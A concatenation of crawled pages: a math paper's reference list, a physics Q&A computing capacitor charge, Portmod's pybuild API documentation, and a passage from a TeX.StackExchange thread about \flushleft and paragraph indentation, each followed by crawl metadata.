Acknowledgements The author thanks the referee for many useful comments, and thanks Dawei Shen and Dong Yang for helpful discussions. The author still remembers that Professor Ragnar-Olaf Buchweitz sent a copy of the masterpiece [7] to him around 10 years ago. Funding This work is supported by the National Natural Science Foundation of China (Nos. 11522113 and 11671245) and the Fundamental Research Funds for the Central Universities. References 1 G. Abrams and G. Aranda Pino , The Leavitt path algebra of a graph , J. Algebra 293 ( 2005 ), 319 – 334 . Google Scholar CrossRef Search ADS 2 M. Auslander and M. Bridger , Stable module theory , Mem. Amer. Math. Soc. 29 ( 1997 ), 246 – 248 . 3 M. Auslander , I. Reiten and S. O. Smalø , Representation Theory of Artin Algebras, Cambridge Studies in Adv. Math. 36 , Cambridge University Press , Cambridge , 1995 . 4 A. Beligiannis , The homological theory of contravariantly finite subcategories: Auslander–Buchweitz contexts, Gorenstein categories and (co-)stabilization , Commun. Algebra 28 ( 2000 ), 4547 – 4596 . Google Scholar CrossRef Search ADS 5 A. Beligiannis and M. Marmaridis , Left triangulated categories arising from contravariantly finite subcategories , Commun. Algebra 22 ( 1994 ), 5021 – 5036 . Google Scholar CrossRef Search ADS 6 P. A. Bergh , D. A. Jorgensen and S. Oppermann , The Gorenstein defect category , Quart. J. Math. 66 ( 2015 ), 459 – 471 . Google Scholar CrossRef Search ADS 7 R. O. Buchweitz , Maximal Cohen–Macaulay Modules and Tate Cohomology over Gorenstein Rings, Unpublished Manuscript, 1987 . Available at: http://hdl.handle.net/1807/16682. 8 X. Chen , S. Geng and M. Lu , The singularity categories of the cluster-tilted algebras of Dynkin type , Algebr. Represent. Theor. 18 ( 2015 ), 532 – 554 . 9 X. W. Chen , Singularity categories, Schur functors and triangular matrix rings , Algebr. Represent. Theor. 12 ( 2009 ), 181 – 191 . Google Scholar CrossRef Search ADS 10 X. W. Chen , The singularity category of an algebra with radical square zero , Doc. Math. 16 ( 2011 ), 921 – 936 . 11 X. W. Chen , Algebras with radical square zero are either self-injective or CM-free , Proc. Amer. Math. Soc. 140 ( 2012 ), 93 – 98 . 12 X. W. Chen , D. Shen and G. Zhou , The Gorenstein-projective modules over a monomial algebra, arXiv:1501.02978, Proc. Royal Soc. Edin. Sect. A Math., accepted for publication. 13 X. W. Chen and D. Yang , Homotopy categories, Leavitt path algebras and Gorenstein projective modules , Inter. Math. Res. Not. 10 ( 2015 ), 2597 – 2633 . 14 D. Happel , Triangulated Categories in the Representation Theory of Finite Dimensional Algebras, London Math. Soc., Lecture Notes Ser. 119, Cambridge University Press, Cambridge, 1988 . 15 D. Happel , On Gorenstein algebras, In: Progress in Math. 95, Birkhäuser Verlag, Basel, 1991 , 389–404. 16 A. Heller , Stable homotopy categories , Bull. Amer. Math. Soc. 74 ( 1968 ), 28 – 63 . Google Scholar CrossRef Search ADS 17 C. Holdaway and S. P. Smith , An equivalence of categories for graded modules over monomial algebras and path algebras of quivers , J. Algebra 353 ( 2012 ), 249 – 260 . Corrigendum, J. Algebra 357 (2012) 319–321. Google Scholar CrossRef Search ADS 18 M. Hoshino , Algebras of finite self-injective dimension , Proc. Amer. Math. Soc. 112 ( 1991 ), 619 – 622 . Google Scholar CrossRef Search ADS 19 T. Howard , Complexity classes of modules over finite dimensional algebras , J. Pure Appl. Algebra 219 ( 2015 ), 5195 – 5205 . Google Scholar CrossRef Search ADS 20 M. Kalck , Singularity categories of gentle algebras , Bull. London Math. Soc. 47 ( 2015 ), 65 – 74 . Google Scholar CrossRef Search ADS 21 B. Keller and D. Vossieck , Sous les catégories dérivées , C.R. Acad. Sci. Paris, t. 305 Série I ( 1987 ), 225 – 228 . 22 D. Orlov , Triangulated categories of singularities and D-branes in Landau–Ginzburg models , Trudy Steklov Math. Inst. 204 ( 2004 ), 240 – 262 . 23 C. Psaroudakis , O. Skartsaterhagen and O. Solberg , Gorenstein categories, singular equivalences and finite generation of cohomology rings in recollements , Trans. Amer. Math. Soc. Ser. B 1 ( 2014 ), 45 – 95 . Google Scholar CrossRef Search ADS 24 D. Quillen , Higher algebraical K-theory I, Springer Lecture Notes in Math. 341, 1973 , 85–147. 25 J. Rickard , Derived categories and stable equivalence , J. Pure Appl. Algebra 61 ( 1989 ), 303 – 317 . Google Scholar CrossRef Search ADS 26 D. Shen , The singularity category of a Nakayama algebra , J. Algebra 429 ( 2015 ), 1 – 18 . Google Scholar CrossRef Search ADS 27 S. P. Smith , Equivalence of categories involving graded modules over path algebras of quivers , Adv. Math. 230 ( 2012 ), 1780 – 1810 . Google Scholar CrossRef Search ADS 28 M. Tierney , Categorical Constructions in Stable Homotopy Theory, Lecture Notes in Math. 87, Springer-Verlag, Berlin, Heidelberg, New York, 1969 . 29 B. Zimmermann Huisgen , Predicting syzygies over monomial relation algebras , Manu. Math. 70 ( 1991 ), 157 – 182 . Google Scholar CrossRef Search ADS 30 A. Zimmermann and G. Zhou , On singular equivalences of Morita type , J. Algebra 385 ( 2013 ), 64 – 79 . Google Scholar CrossRef Search ADS © The Author(s) 2018. Published by Oxford University Press. All rights reserved. For permissions, please e-mail: journals.permissions@oup.com This article is published and distributed under the terms of the Oxford University Press, Standard Journals Publication Model (https://academic.oup.com/journals/pages/about_us/legal/notices) Journal The Quarterly Journal of MathematicsOxford University Press Published: Mar 12, 2018 You’re reading a free preview. Subscribe to read the entire article. DeepDyve is your personal research library It’s your single place to instantly discover and read the research that matters to you. Enjoy affordable access to over 18 million articles from more than 15,000 peer-reviewed journals. All for just \$49/month Search Query the DeepDyve database, plus search all of PubMed and Google Scholar seamlessly Organize Save any article or search result from DeepDyve, PubMed, and Google Scholar... all in one place. Access Get unlimited, online access to over 18 million full-text articles from more than 15,000 scientific journals. Your journals are on DeepDyve Read from thousands of the leading scholarly journals from SpringerNature, Elsevier, Wiley-Blackwell, Oxford University Press and more. All the latest content is available, no embargo periods. DeepDyve DeepDyve Pro Price FREE \$49/month \$360/year Save searches from Google Scholar, PubMed Create lists to organize your research Export lists, citations Read DeepDyve articles Abstract access only Unlimited access to over 18 million full-text articles Print 20 pages / month PDF Discount 20% off
2018-07-17 14:04:32
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9675310850143433, "perplexity": 1164.1273171655932}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 5, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-30/segments/1531676589726.60/warc/CC-MAIN-20180717125344-20180717145344-00511.warc.gz"}
http://clay6.com/qa/45904/a-potential-difference-of-250-volt-is-applied-across-the-plates-of-a-capaci
Want to ask us a question? Click here Browse Questions Ad 0 votes # A potential difference of $250\; volt$ is applied across the plates of a capacitor of $10\; pF$. Calculate the charge on the plates of the capacitor. Can you answer this question? ## 1 Answer 0 votes Here,$V= 250 V$ $C= 10 \;p$ $F= 10 \times 10^{-12} F= 10^{-11}F$ $Q= CV=10^{-11} \times 250=2.5 \times 10^{-9}$ Hence A is the correct answer. answered Jun 13, 2014 by 0 votes 1 answer 0 votes 1 answer
2017-05-25 14:15:57
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7300719618797302, "perplexity": 2945.6141603308165}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-22/segments/1495463608084.63/warc/CC-MAIN-20170525140724-20170525160724-00433.warc.gz"}
https://portmod.readthedocs.io/en/stable/dev/pybuild/pybuild.html
# pybuild package ## Module contents The module accessible within pybuilds Note that this module should not be imported outside of pybuild files class pybuild.File(NAME, REQUIRED_USE='', OVERRIDES=[], **kwargs)[source] Bases: object Represents important installed files and their metadata Warning This class has been deprecated as of Portmod 2.4. It will be removed in Portmod 3.0 Parameters NAME: str Name of the file relative to the root of the InstallDir OVERRIDES: Union[str, List[str]] A list of files which this overrides when sorting (if applicable). Can either be in the form of a string containing use-conditionals (note that this does not support files that contain spaces) or a list of files to override. Note that these overridden files are not considered masters and do not need to be present. For archives it determines the order in which the fallback archives will be searched during VFS lookups. REQUIRED_USE: str Requirements for installing this file The default empty string is always satisfied. See Pybuild2.REQUIRED_USE for details on the syntax. class pybuild.InstallDir(PATH, REQUIRED_USE='', PATCHDIR='.', S=None, WHITELIST=None, BLACKLIST=None, RENAME=None, DATA_OVERRIDES='', ARCHIVES=(), VFS=None, DOC=(), **kwargs)[source] Bases: object Represents a directory in the Virtual File System Note that arbitrary arguments can be passed to the constructor, as repositories may make use of custom information. See the repository-level documentation for such information. Warning This class has been deprecated as of Portmod 2.4. It will be removed in Portmod 3.0 Parameters ARCHIVES: List[File] A list of File objects representing VFS archives. These will be searched, in order, during VFS file lookups if the file is not present in the package directories. BLACKLIST: Optional[List[str]] If present, does not install files matching the patterns in this list. fnmatch-style globbing patterns (e.g. * and [a-z]) can be used DATA_OVERRIDES: str A list of packages that this InstallDir should override in the VFS This only has a different effect from Pybuild1.DATA_OVERRIDES if multiple PATCHDIRs are set, as it can define overrides for individual PATCHDIRS, while Pybuild1.DATA_OVERRIDES affects all PATCHDIRs. See Pybuild1.DATA_OVERRIDES for details of the syntax. DOC: List[str] A list of patterns matching documentation files within the package This documentation will be installed separately fnmatch-style globbing patterns (e.g. * and [a-z]) can be used. PATCHDIR: str The destination path of the InstallDir within the package’s directory. Defaults to “.”, i.e. the root of the mod directory. If multiple InstallDirs share the same PATCHDIR they will be installed into the same directory in the order that they are defined in the INSTALL_DIRS list. Each unique PATCHDIR has its own entry in the VFS, and its own sorting rules PATH: str The path to the data directory that this InstallDir represents relative to the root of the archive it is contained within. RENAME: Optional[str] Destination path of this directory within the final directory. E.g.: InstallDir("foo/bar", PATCHDIR=".", RENAME="bar") Will install the contents of foo/bar (in the source) into the directory bar inside the package’s installation directory (and also the VFS). REQUIRED_USE: str A list of use flags with the same format as the package’s REQUIRED_USE variable which enable the InstallDir if satisfied. Defaults to an empty string that is always satisfied. S: Optional[str] The source directory corresponding to this InstallDir. Similar function to S for the entire pybuild, this determines which directory contains this InstallDir, and generally corresponds to the name of the source archive, minus extensions. This is required for packages that contain more than one source, but is automatically detected for those with only one source if it is not specified, and will first take the value of Pybuild2.S, then the source’s file name without extension if the former was not defined. VFS: Optional[bool] Whether or not this InstallDir gets added to the VFS Defaults to the value of the VFS variable in the profile configuration WHITELIST: Optional[List[str]] If present, only installs files matching the patterns in this list. fnmatch-style globbing patterns (e.g. * and [a-z]) can be used get_files()[source] Generator function yielding file subattributes of the installdir class pybuild.Pybuild1[source] Bases: Pybuild2 Legacy class. Superseded by Pybuild2 Warning This class has been deprecated as of Portmod 2.4. It will be removed in Portmod 3.0 DATA_OVERRIDES = '' A use-reduce-able list of atoms indicating packages whose data directories should come before the data directories of this package when sorting data directories. They do not need to be dependencies. Blockers (atoms beginning with !!) can be used to specify underrides, and use dependencies (e.g. the [bar] in foo[bar]) can be used to conditionally override based on the target atom’s flag configuration. Not included in PMS INSTALL_DIRS: List[InstallDir] = [] The INSTALL_DIRS variable consists of a python list of InstallDir objects. E.g.: INSTALL_DIRS=[ InstallDir( 'Morrowind/Data Files', REQUIRED_USE='use use ...', DESTPATH='.', PLUGINS=[File('Plugin Name', REQUIRED_USE='use use ...', satisfied )], ARCHIVES=[File('Archive Name')], S='Source Name Without Extension', ) ] Not included in PMS REBUILD_FILES: List[str] = [] Files in the VFS which, if changed, should cause this package to be rebuilt Can include glob-style patterns using the , ? and [] operators. See https://docs.python.org/3/library/fnmatch.html. Unlike normal fnmatch parsing, wildcards () will not match accross path separators. This field can be modified during installation, and will only be used after the package has been installed. TIER = 'a' The Tier of a package represents the position of its data directories and plugins in the virtual file system. This is used to group packages in such a way to avoid having to individually specify overrides whenever possible. The value is either in the range [0-9] or [a-z]. Default value: ‘a’ Tier 0 represents top-level mods such as morrowind Tier 1 is for mods that replace or modify top-level mods. E.g. texture and mesh replacers. Tier 2 is for large mods that are designed to be built on top of by other mods, such as Tamriel Data Tier a is for all other mods. Tier z is for mods that should be installed or loaded last. E.g. omwllf The remaining tiers are reserved in case the tier system needs to be expanded Not included in PMS get_files(typ)[source] Returns all enabled files and their directories Parameters typ (str) – Return type src_install()[source] The src_install function installs the package’s content to a directory specified in Pybuild2.D. The initial working directory is Pybuild2.S, falling back to Pybuild.WORKDIR if the directory does not exist. The default implementation used when the package lacks the src_install function moves each InstallDir in Pybuild1.INSTALL_DIRS which is not hidden due to an unsatisfied REQUIRED_USE into Pybuild2.D. unpack(archives)[source] Unpacks the given archive into the workdir Uses patool as its backend. Parameters archives (Union[str, Iterable[Union[Source, str]]]) – The list of archives to be unpacked class pybuild.Pybuild2[source] Bases: FullPybuild The class all Pybuilds should derive. The name and path of a pybuild declares the package name, category, version and (optionally) revision: {CATEGORY}/{PKG_NAME}-{VER}(-r{REV}).pybuild Categories and package names may contain lower case letters, numbers and hyphens. Versions may contain numbers and dots. Revisions may only contain numbers (following the -r prefix). (See the PMS for the complete naming scheme). Note that revisions refer to revisions of the pybuild itself, not the package, and are used to indicate that the way the mod is configured has changed in a way that will impact the installed version. For changes, such as the source files moving, that would not impact a mod that is already installed, you do not need to update the revision. There are certain fields which are defined automatically and may only be available in some scopes: Variable Scope Pybuild2.P All scopes Pybuild2.PF All scopes Pybuild2.PN All scopes Pybuild2.CATEGORY All scopes Pybuild2.PV All scopes Pybuild2.PVR All scopes Pybuild2.USE All scopes except __init__ Pybuild2.WORKDIR src_* Pybuild2.T All scopes except __init__ Pybuild2.D Pybuild2.src_install() Pybuild2.FILESDIR src_* Pybuild2.ROOT src_*, pkg_* Pybuild2.A src_*, pkg_nofetch Pybuild2.UNFETCHED pkg_nofetch Pybuild2.S src_* 1(1,2,3,4,5,6,7,8,9,10,11,12,13) Fields which are set automatically and should not be defined in the package file. Described in the table above. A: List[Source] The list of enabled sources 1 Scope: All except __init__ CATEGORY: str The package’s category. 1 E.g. base D: str The full path of the directory where the package is to be installed. 1 Note that this is a temporary directory and not the final install location. Scope: src_install DEPEND: str = '' Build dependencies. The DEPEND field is used to specify packages which need to be installed in order for this package to install correctly. Most mods do not have build dependencies, however mods that require patching using tools external to portmod, or packages that generate content from other sources, will need to include their masters, or the other sources, as build dependencies, to ensure that they are installed prior to the package being installed. Format (both DEPEND and RDEPEND): A list of dependencies in the form of package atoms. All dependencies should include both category and package name. Versions should also be included if the package depends on a specific version of another mod. It is recommended not to include a version number in the dependency unless it is known that the package will not work with other versions. Ranges of versions can be indicated by prefixing >,<,<=,>= to the atoms. E.g. >=cat/foo-1.0 Specific versions can be indicated by prefixing = (matches version and revision exactly) or ~ (matches version, but allows any revision) to the atoms. E.g. =cat/foo-1.0 Use flag dependencies can be specified in the following manner: • cat/foo[flag] - Indicates that flag must be enabled • cat/foo[flag,flag2] - Indicates that both flag and flag2 must be enabled • cat/foo[!flag] - Indicates that flag must be disabled • cat/foo[flag?] - Indicates that flag must be enabled if it is enabled for this package • cat/foo[!flag?] - Indicates that flag must be disabled if it is enabled for this package Atoms can be surrounded by use-conditionals if they are only dependencies when that use flag is enabled/disabled. E.g. flag? ( cat/foo ) Atoms can be grouped and prefixed by a || operator to indicate that any of the given packages will satisfy the dependency. E.g. || ( cat/foo cat/bar cat/baz ) Note that it is required that the parentheses ( ) are separated from the atoms by whitespace. Packages which cannot be installed at the same time can be marked as blocks using the !! operator. I.e. !!cat/foo indicates that cat/foo cannot be installed at the same time as the current package. DESC: str = '' A short description of the package. Is may (depending on options provided) be used in searches. Note that a longer description can be provided in metadata.yaml. DOCS: List[str] = ['README*', 'readme*', 'ReadMe*', 'ChangeLog', 'CHANGELOG*', 'AUTHORS*', 'NEWS*', 'TODO*', 'CHANGES*', 'THANKS*', 'BUGS*', 'FAQ*', 'CREDITS*', 'Doc/*', 'doc/*', 'docs/*', 'Docs/*'] A list of documentation patterns for the default src_install to install using Pybuild2.dodoc FILESDIR: str Path of the directory containing additional repository files Scope: src_* HOMEPAGE: str = '' The URL of the package’s homepage(s). Used for descriptive purposes and included in search results. IUSE: Set[str] = '' A field containing a space-separated list of the use flags used by the package. IUSE should contain all regular use flags used by this package, both local and global. Prefixing the use flags with a + means that the option is enabled by default. Otherwise use flags are disabled by default. Note that you do not need to include TEXTURE_SIZES type flags in IUSE, but USE_EXPAND variables should be included in IUSE. KEYWORDS: str = '' Keywords indicating compatibility. Existence of the keyword indicates that the mod is stable on that platform. a ~ in front of the keyword indicates that the mod is unstable on that platform no keyword indicates that the mod is untested on that platform a - in front of the keyword indicates that the mod is known to not work on that platform E.g. A package that works on OpenMW but does not on tes3mp: KEYWORDS='openmw -tes3mp' LICENSE: str = '' One or more licenses used by the package. A list of licenses can be found in the licenses directory of the repository. NAME: str = '' Descriptive package name. The package name used for identification is the name used in the filename, however this name is included when searching for packages. P: Atom The package name and version. 1 E.g.: example-suite-1.0 PATCHES: str = '' A list of patch files stored within the package’s files directory in the repository Note that unlike as specified in the PMS, their paths must be relative to the files directory. See apply_patch() for details on the supported patch format. PF: Atom The package name with version and revision. 1 E.g.: example-suite-1.0-r1 PN: Atom The package name without version. 1 E.g.: example-suite PR: str The package’s revision 1 E.g. r1 Is equal to r0 is no revision is specified PROPERTIES: str = '' A white-space-delimited list of additional properties of the given pybuild to enable special behaviour. Possible values are given below: • live: Indicates that the pybuild doesn’t have a specific version (e.g. if installing from a git repository branch but not using a specific commit). Live pybuilds should have an empty KEYWORDS list, as stability testing is not meaningful if the upstream source is changing. Live packages must override Pybuild2.can_update_live(). • local: Only used internally to refer to Local mods with generated metadata PV: str The package’s version without revision 1 E.g. 1.0 PVR: str The package’s version and revision 1 E.g. 1.0-r1 RDEPEND: str = '' Runtime dependencies. Is used to specify packages which are required at runtime for this package to function. The format is the same as for DEPEND REQUIRED_USE: str = '' An expression indicating valid combinations of use flags. Consists of a string containing sub-expressions of the form given below. Note that the brackets can contain arbitrary nested expressions of this form, and are not limited to what is shown in the examples below. Behaviour Expression flag must be enabled flag flag must not be enabled !flag If flag1 enabled then flag2 enabled flag1? ( flag2 ) If flag1 disabled then flag2 enabled !flag1? ( flag2 ) If flag1 disabled then flag2 disabled !flag1? ( !flag2 ) Must enable any one or more (inclusive or) || ( flag1 flag2 flag3 ) Must enable exactly one but not more (exclusive or) ^^ ( flag1 flag2 flag3 ) May enable at most one ?? ( flag1 flag2 flag3 ) RESTRICT: str = '' Lists features which should be disabled for this package The following two options are supported: • mirror: The package’s SRC_URI entries should not be mirrored, and mirrors should not be checked when fetching. • fetch: The packages’s SRC_URI entries should not be fetched automatically, and the pkg_nofetch function should be invoked if a source cannot be found. This option implies mirror. Note that portmod also supports determining these automatically based on source URIs and licenses, so it is no longer necessary to set them explicitly. mirror is restricted for licenses which are not in the REDISTRIBUTABLE license group (see license_groups.yaml), and fetch is restricted for files which are not redistributable (according to license) and do not have a scheme in their SRC_URI (i.e. just a filename, no https://domain.tld etc.). ROOT: str The full path of the prefix root where packages will be installed Note: This functions as both ROOT and SYSROOT (as defined by PMS section 11.1). Scope: src_*, pkg_* S: Optional[str] = None Specifies the default working directory for src_* functions. The default value (if S is None) is the name (minus extension) of the first source in SRC_URI (after use-conditionals have been evaluated). If this path does not exist, the working directory falls back to WORKDIR. This is also used to determine the base source path used for installing a InstallDir in the default src_install if S is not defined on the InstallDir. SRC_URI: str = '' A List of sources to be fetched. If source files should be renamed, this can be done with the arrow operator as shown in the example below. Sources can be wrapped in use-conditional expressions to prevent certain sources from being downloaded unless certain use flags are set or unset. E.g.: SRC_URI=""" http://mw.modhistory.com/file.php?id=9321 -> FileName-1.0.zip flag? ( https://cdn.bethsoft.com/elderscrolls/morrowind/other/masterindex.zip ) """ Note that if you are renaming files, they should correspond to the original filename as best possible, but should also contain version information of some sort to prevent conflicts with other sources from the same package. That is, if the package is updated, we do not want the updated source name to be the same as a previous source name, even if the source name did not change upstream. T: str Path to a temporary directory which may be used during packaging 1 Scope: All except __init__ TEXTURE_SIZES: str = '' A field declaring the texture size options that the package supports. If only one texture size option is available, this field need not be included. Texture sizes should be numbers representing the size of the texture in pixels. Given that textures are usually two-dimensional, the convention is to use: $$\sqrt{ l \cdot w}$$ E.g.: TEXTURE_SIZES = "1024 2048" This is a special type of USE_EXPAND variable, as use flags are created for its values in the form texture_size_SIZE (in the above example texture_size_1024 and texture_size_2048). These use flags can (and should) be used in the pybuild to enable sources and InstallDirs conditionally depending on whether or not the texture size was selected. Exactly one of these use flags will be enabled when the mod is installed depending on the value of the TEXTURE_SIZE variable in the user’s portmod.cfg. Not included in the PMS UNFETCHED: List[Source] The list of sources which need to be fetched 1 Scope: pkg_nofetch USE: Set[str] Enabled use flags 1 Scope: All except __init__ WORKDIR: str The directory where packaging takes place 1 Scope: src_* can_update_live()[source] Indicates whether or not a live package can be updated. The default implementation just returns False. If the package has live in its PROPERTIES, it must implement this method. Return type bool Returns If the package has PROPERTIES="live" and can be updated, should return True Otherwise, should return False dodoc(pattern)[source] Installs documentation matching the given pattern into the image directory (Self.D) Parameters pattern (str) – A pattern which can include glob-style wildcards as implemented by glob. static execute(command, pipe_output=False, pipe_error=False)[source] Allows execution of arbitrary commands at runtime. Command is sandboxed with filesystem and network access depending on the context in which it is called Parameters Return type get_installed_env()[source] Returns a dictionary containing installed object values info(string)[source] Displays info message both immediately, and in the summary after all transactions have been completed Parameters string (str) – String to display pkg_postinst()[source] Function called immediately after package installation In Pybuild1, this function has full write permissions to ROOT. In Pybuild2 it only has read permissions. Note that the default does nothing, and it will not even be executed unless defined. pkg_prerm()[source] Function called immediately before package removal In Pybuild1, this function has full write permissions to ROOT. In Pybuild2 it only has read permissions. Note that the default does nothing, and it will not even be executed unless defined. pkg_pretend()[source] May be used to carry out sanity checks early on in the install process Note that the default does nothing, and it will not even be executed unless defined. pkg_pretend is run separately from the main phase function sequence, and does not participate in any kind of environment saving. There is no guarantee that any of an package’s dependencies will be met at this stage, and no guarantee that the system state will not have changed substantially before the next phase is executed. pkg_pretend must not write to the filesystem and the initial working directory should not be expected to be consistent. src_install()[source] The src_install function installs the package’s content to a directory specified in Pybuild2.D. The initial working directory is Pybuild2.S, falling back to Pybuild.WORKDIR if the directory does not exist. The default implementation used when the package lacks the src_install function shall behave as: for pattern in self.DOCS: self.dodoc(pattern) src_prepare()[source] The src_prepare function can be used for post-unpack source preparation. The initial working directory is Pybuild2.S, falling back to Pybuild2.WORKDIR if the directory does not exist. The default implementation used when the package lacks the src_prepare function shall behave as: if self.PATCHES: for patch in use_reduce(self.PATCHES, self.USE, flat=True): path = os.path.join(self.FILESDIR, patch) apply_patch(path) src_unpack()[source] The src_unpack function extracts all of the package’s sources. The initial working directory must be self.WORKDIR, and the default implementation used when the package lacks the src_unpack function shall behave as: self.unpack(self.A) unpack(archives)[source] Unpacks the given archive into the workdir Uses shutil.unpack_archive() as its backend, supporting the following archive formats: - .zip - .tar - .tar.xz / .txz - .tar.bz2 / .tbz2 - .tar.xz / .txz Parameters archives (Union[str, Iterable[Union[Source, str]]]) – The list of archives to be unpacked validate()[source] (Since Portmod 2.4) inquisitor will call this function when scanning repositories. Only code that would be valid in the package global scope (see Sandbox) may be used. This is designed to allow basic structural checks without hindering package loading. It differs from Pybuild2.pkg_pretend() in that it is meant for static checks, not runtime checks. warn(string)[source] Displays warning message both immediately, and in the summary after all transactions have been completed Parameters string (str) – String to display pybuild.apply_patch(patch)[source] Applies git patch using Git apply Patch files must be in a format that can be applied via git apply. Such patches can be produced with git diff --no-index ORIG NEW. The --binary option can be used to produce binary diffs for non-text files. Patches must be self-applying. I.e. they should not rely on paths being passed to git apply, and must apply from the default working directory in src_prepare. It is recommended that a comment header is included to describe what the patch does, where it’s from etc. Parameters patch (str) – Path to the patch to be applied pybuild.find_file(name)[source] Locates the path of a file within the OpenMW virtual file system Warning This function has been deprecated as of Portmod 2.4. It will be removed in Portmod 3.0 Parameters name (str) – The relative path within the VFS to search for Return type str Returns The absolute path of the file pybuild.get_masters(file)[source] Detects masters for the given file Warning This function has been deprecated as of Portmod 2.4 it will be removed in Portmod 3.0 Parameters file (str) – File to be examined Return type Returns A set of all the master names pybuild.list_dir(name)[source] Locates all path of files matching the given pattern within the OpenMW virtual file system Warning This function has been deprecated as of Portmod 2.4. It will be removed in Portmod 3.0 Parameters name (str) – The relative path of the directory within the VFS Return type Returns A list of files contained within the directory pybuild.patch_dir(src, dst, *, overwrite=True, ignore=None, case_sensitive=True, move_function=<function _move2>)[source] Copies src ontop of dst Parameters Raises Return type str Returns Returns dst pybuild.use_reduce(depstr, uselist={}, masklist={}, matchall=False, excludeall={}, is_src_uri=False, opconvert=False, flat=False, is_valid_flag=None, token_class=None, matchnone=False)[source] Takes a dep string and reduces the use? conditionals out, leaving an array with subarrays. All redundant brackets are removed. Adapted from portage’s use_reduce Parameters Return type List Returns The use reduced depend array pybuild.version_gt(version1, version2)[source] Version comparision function Parameters Return type bool` Returns True if and only if version1 is greater than version2
2022-11-29 18:11:35
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.32919996976852417, "perplexity": 5960.7998787742135}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446710710.91/warc/CC-MAIN-20221129164449-20221129194449-00234.warc.gz"}
http://tex.stackexchange.com/questions/85837/paragraphs-not-automatically-indenting?answertab=votes
# paragraphs not automatically indenting with the following code my paragraphs aren't automatically indenting... I'm confused as to why because I've done a decent bit of LaTeXing before with very similar packages and with the same article class yet it's always done it for me automatically after two returns. Here's the .tex file code: \documentclass[12pt]{article} \usepackage{graphicx} \usepackage{amssymb} \usepackage[greek,english]{babel} \usepackage{color} \usepackage{listings} \usepackage{float} \begin{document} \flushleft{ name\\ class\\ 12.11.12\\ } \subsection*{Introduction} test sakdfhaijsfdhkjsf \end{document} I'm sure I'm missing something obvious, I know the first para won't indent but as to why the second two don't I have no idea. They get a newline but no indent. Any help would be much appreciated, thanks. - Perhaps you could edit your question so as to make the title more explicit, now that an answer has been found. I am sure other people might have similar issues. –  ienissei Dec 7 '12 at 8:04 \flushleft is not a command that takes arguments. The way you have it written everything (the entire document) after the command is flushed left. To get what you want you should write the following {\flushleft name\\ class\\ 12.11.12} \section*{Radix Trees} that is set the command and the text to be flushed withing curly braces. - Awesome, thanks very much! –  Noah Dec 6 '12 at 18:35 @Noah Notice that I took the liberty and improved the code a bit more. –  tohecz Dec 6 '12 at 18:39 And please notice that instead of \flushleft, the command \noindent could be used here, because in this case, the only effect of \flushleft is suppressing the indentation. –  tohecz Dec 6 '12 at 18:39 Don't use \flushleft by itself; in this application use either \raggedright (with a finishing \par before the closing brace) or enclose the text in the flushleft environment (which adds some space above and below it). –  egreg Dec 6 '12 at 18:55 @egreg, \begin{flushleft} calls \flushleft inside a brace group, so the space inserted above will be exactly the same. Still, it is of course better to delimit the scope of flushleft by calling it as an environment (which also ensures that \endflushleft will be called, if it exists, for spacing below). –  alexis Dec 6 '12 at 21:14 As others have commented, \flushleft is not a command with arguments (like, for instance, \textbf or \emph). Actually \flushleft is not a user command at all. It exists only for internal reasons, for making the flushleft environment work. You have many possibilities for setting the author data for a document that seems not to require the full fledged \maketitle. In what follows I assume that code snippets are preceded by your preamble (slightly modified) \documentclass[12pt]{article} \usepackage[greek,english]{babel} \usepackage{graphicx} \usepackage{amsmath,amssymb} \usepackage{color} \usepackage{listings} \usepackage{float} \setcounter{secnumdepth}{-2} % no section number ## First way \begin{document} \noindent name \noindent class \noindent date ## Second way Here the result is the same as in the preceding way, but the code is more compact \begin{document} {\raggedright name \\ class \\ date \\ } ## Third way This may add some space below the data. Ordinarily, the flushleft environment adds also vertical space above it, but here we are at the 